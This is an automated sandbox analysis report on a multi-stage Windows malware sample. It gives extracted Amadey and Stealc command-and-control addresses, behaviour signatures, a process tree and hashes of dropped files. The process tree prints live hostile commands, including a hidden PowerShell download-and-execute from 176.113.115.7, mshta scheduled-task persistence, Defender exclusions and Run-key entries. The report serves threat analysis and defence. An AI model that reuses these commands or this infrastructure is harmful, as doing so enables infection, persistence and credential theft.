Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 20:59

General

  • Target

    2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    7f36eaec1b9d90d765a3ed4bc4d05757

  • SHA1

    56ca4cf6a18ea8ad647946d30135eae3f85e83f1

  • SHA256

    1b5b2b683f5d9e921b58f57c77da6a0d02c71c341e73d59629a4bafda8d199bc

  • SHA512

    88575f18f0a6fe6f0543066124db338eac5db12d6d9a9f4c6fcbc98fa6265e917cf33eac0702fa6a645fe857e040c88db3137e6c3dd3f9a5caf2dd2bfc3be230

  • SSDEEP

    24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8a03u:0TvC/MTQYxsWR7a03

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 15 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 54 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3156
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5840
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:5464
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3052
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4112
        • C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE
          "C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4976
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Users\Admin\AppData\Local\Temp\10343630101\af74103f8c.exe
              "C:\Users\Admin\AppData\Local\Temp\10343630101\af74103f8c.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2052
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10343630101\af74103f8c.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3972
            • C:\Users\Admin\AppData\Local\Temp\10343640101\ac265fad48.exe
              "C:\Users\Admin\AppData\Local\Temp\10343640101\ac265fad48.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10343640101\ac265fad48.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:4248
            • C:\Users\Admin\AppData\Local\Temp\10343650101\2eb647d70d.exe
              "C:\Users\Admin\AppData\Local\Temp\10343650101\2eb647d70d.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:6012
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4928
            • C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe
              "C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3956
            • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe
              "C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:6016
            • C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe
              "C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4716
              • C:\Windows\SysWOW64\CMD.exe
                "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4908
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3840
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3788
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  8⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1168
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4208
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 418377
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2256
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Leon.cab
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:3644
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "BEVERAGES" Compilation
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2172
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4288
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1032
                • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                  Passwords.com N
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:4712
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:5408
            • C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe
              "C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:6072
              • C:\Windows\SysWOW64\CMD.exe
                "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4600
            • C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe
              "C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              PID:5392
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                7⤵
                  PID:2412
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5888
                • C:\Windows\system32\svchost.exe
                  "C:\Windows\system32\svchost.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Adds Run key to start application
                  PID:5324
                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    8⤵
                    • Sets service image path in registry
                    • Executes dropped EXE
                    • Suspicious behavior: LoadsDriver
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4476
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Add-MpPreference -ExclusionPath C:\
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3788
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Remove-MpPreference -ExclusionPath C:\
                      9⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:6704
                  • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                    "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                    8⤵
                    • Deletes itself
                    • Executes dropped EXE
                    PID:4016
                    • C:\Users\Admin\AppData\Local\Temp\{fee40664-a03e-4852-ba0c-66113efdc5cf}\6edd35b4.exe
                      "C:\Users\Admin\AppData\Local\Temp\{fee40664-a03e-4852-ba0c-66113efdc5cf}\6edd35b4.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                      9⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • System Location Discovery: System Language Discovery
                      PID:8068
                      • C:\Users\Admin\AppData\Local\Temp\{c5794c97-0a65-4bde-863b-2ea75b2c3638}\f9c0b2fe.exe
                        C:/Users/Admin/AppData/Local/Temp/{c5794c97-0a65-4bde-863b-2ea75b2c3638}/\f9c0b2fe.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                        10⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Impair Defenses: Safe Mode Boot
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • Enumerates connected drives
                        • Writes to the Master Boot Record (MBR)
                        • Checks for VirtualBox DLLs, possible anti-VM trick
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:8840
              • C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe
                "C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                PID:1040
                • C:\Windows\SysWOW64\CMD.exe
                  "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:628
              • C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe
                "C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:7380
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:8100
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                    8⤵
                    • Adds Run key to start application
                    • System Location Discovery: System Language Discovery
                    PID:8196
                  • C:\Users\Public\Netstat\bild.exe
                    C:\Users\Public\Netstat\bild.exe
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:8908
              • C:\Users\Admin\AppData\Local\Temp\10343730101\kDveTWY.exe
                "C:\Users\Admin\AppData\Local\Temp\10343730101\kDveTWY.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:9656
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:9756
              • C:\Users\Admin\AppData\Local\Temp\10343740101\kZZeUXM.exe
                "C:\Users\Admin\AppData\Local\Temp\10343740101\kZZeUXM.exe"
                6⤵
                • Executes dropped EXE
                PID:12112
                • C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                  C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
                  7⤵
                  • Executes dropped EXE
                  PID:12284
                  • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
                    8⤵
                    • Executes dropped EXE
                    PID:2892
                    • C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                      C:\Users\Admin\AppData\Roaming\Oracle\javasupport.exe
                      9⤵
                      • Executes dropped EXE
                      PID:12360
                      • C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
                        10⤵
                        • Executes dropped EXE
                        PID:12440
                        • C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                          C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
                          11⤵
                          • Executes dropped EXE
                          PID:12540
                          • C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                            C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
                            12⤵
                            • Executes dropped EXE
                            PID:12596
                            • C:\Windows\system32\reg.exe
                              reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplugin_platform.exe"
                              13⤵
                              • Modifies registry key
                              PID:12696
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplugin_platform.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe\"'"
                              13⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:12812
              • C:\Users\Admin\AppData\Local\Temp\10343750101\c552752d75.exe
                "C:\Users\Admin\AppData\Local\Temp\10343750101\c552752d75.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:13292
              • C:\Users\Admin\AppData\Local\Temp\10343760101\f048e1ee3b.exe
                "C:\Users\Admin\AppData\Local\Temp\10343760101\f048e1ee3b.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5616
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:368
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:5608

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_b296ad91a_arkmon.sys

      Filesize

      390KB

      MD5

      7c924dd4d20055c80007791130e2d03f

      SHA1

      072f004ddcc8ddf12aba64e09d7ee0ce3030973e

      SHA256

      406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

      SHA512

      ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

      Filesize

      1.9MB

      MD5

      acb40d712d1158cde87a02cb4f16b4d4

      SHA1

      1d2d469b6694306de77879f0c78b024c2847f8ac

      SHA256

      93a5dc1be8f236795c111d119ba8d2255371205b34bba51c92551076ce927c1a

      SHA512

      586ac2e752c9dfacf5d49ba4fcd1ca497ea919d427547fdc38b0245bbfffb5cfcf3237c24411ff9df2d61f9365eebc9fc7cdfe7743f5e8d34a578a122005a80e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FLLW6ZK9\soft[1]

      Filesize

      3.0MB

      MD5

      2cb4cdd698f1cbc9268d2c6bcd592077

      SHA1

      86e68f04bc99f21c9d6e32930c3709b371946165

      SHA256

      c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

      SHA512

      606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FLLW6ZK9\success[1].htm

      Filesize

      1B

      MD5

      cfcd208495d565ef66e7dff9f98764da

      SHA1

      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

      SHA256

      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

      SHA512

      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      08929d4be59aa9d00ecf9e5f2ef33f9a

      SHA1

      b8443915b3b04947772a7f24dbf5f8708e454d67

      SHA256

      e5c09883b751d2e000c72240b6c4afd812444b7e3c18d65817b6c3e88ece3f1e

      SHA512

      963086676857933673b61d01d9ad5478fab3a9d9461eb683e63776c477045699cd892bee7da3d589b1716d6502c994e62d315d400ac0850fb1f87a47bc50e7ce

    • C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE

      Filesize

      1.9MB

      MD5

      2f8376a47e9c064e4cf0d9379c16e4a1

      SHA1

      80ae1fe530c72fdb68d13c3f58a3aa002eb638d0

      SHA256

      26c2222ab7202acaa3d34a2f576539af80f0b300e2aae43c0791f1748b543cda

      SHA512

      cdc81c6b9457b47aa34f9dc4af315aa5a4f690453f1fcf1ca47f4bf87054b7b2ba362eb824e5eb6d9f2b5e334e09bb43686c02a7a92e4cdfd40efb44f7f656ca

    • C:\Users\Admin\AppData\Local\Temp\10343630101\af74103f8c.exe

      Filesize

      4.5MB

      MD5

      dc8a79bc78a1a0600ec101211275eccc

      SHA1

      8c97e296cc941be66560109ae7847b6ffd68fd36

      SHA256

      218a7666ce28ca053e21388489d95339ed59f9cf4662be9f3514668439e2032d

      SHA512

      46bb5a185ea7507376483012ab69960fae952215393ae2411b58e6a2e7a91da52dd4a1ee70e53ea052fef2e56a5d2e68ef89a6598db209e6939325ef3cb58ee7

    • C:\Users\Admin\AppData\Local\Temp\10343640101\ac265fad48.exe

      Filesize

      4.3MB

      MD5

      dfc21cdaa3f4cf680627a41f5a18e772

      SHA1

      ec93a703400b1bf985e7c76d598e1fb69d398460

      SHA256

      7c4976fcf064d1c38148014e5730d3621936180c5ab4ca2e8301f96afd3201fb

      SHA512

      0cd58ba0cb75269937c150700a9e82214d1cf11f77632213848c2dcc62819fad29068965f5b0b4b4ca8c5f39d3ec0b3948bedfddc87448055f60f02727e0bfcb

    • C:\Users\Admin\AppData\Local\Temp\10343650101\2eb647d70d.exe

      Filesize

      1.1MB

      MD5

      96fa728730da64d7d6049c305c40232c

      SHA1

      3fd03c4f32e3f9dbcc617507a7a842afb668c4de

      SHA256

      28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

      SHA512

      c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

    • C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe

      Filesize

      9.8MB

      MD5

      9a2147c4532f7fa643ab5792e3fe3d5c

      SHA1

      80244247bc0bc46884054db9c8ddbc6dee99b529

      SHA256

      3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

      SHA512

      c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

    • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe

      Filesize

      4.9MB

      MD5

      c909efcf6df1f5cab49d335588709324

      SHA1

      43ace2539e76dd0aebec2ce54d4b2caae6938cd9

      SHA256

      d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

      SHA512

      68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

    • C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe

      Filesize

      1.2MB

      MD5

      7d842fd43659b1a8507b2555770fb23e

      SHA1

      3ae9e31388cbc02d4b68a264bbfaa6f98dd0c328

      SHA256

      66b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a

      SHA512

      d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b

    • C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe

      Filesize

      1.4MB

      MD5

      49e9b96d58afbed06ae2a23e396fa28f

      SHA1

      3a4be88fa657217e2e3ef7398a3523acefc46b45

      SHA256

      4d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225

      SHA512

